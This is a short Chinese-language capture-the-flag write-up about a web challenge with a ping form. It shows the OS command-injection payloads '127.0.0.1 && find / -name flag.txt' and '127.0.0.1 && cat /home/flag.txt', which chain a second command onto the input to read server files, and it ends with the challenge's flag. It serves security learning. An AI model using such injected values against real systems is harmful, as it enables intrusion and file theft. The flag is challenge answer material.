打开题目,发现一个 ping 的表单。
ping作为系统命令,在使用的是可以通过注入其他命令的方式以达到操控系统的目的。
猜测 flag 会被存放到一个名为 flag.txt 的文件中直接在表单中提交
127.0.0.1 && find / -name flag.txt
网页成功返回了 ping 的结果以外,也一同返回了查询命令的结果
然后再输入
127.0.0.1 && cat /home/flag.txt
网页打印出flag.txt内容
cyberpeace{c37ec4dc6b54674300953250ec013a14}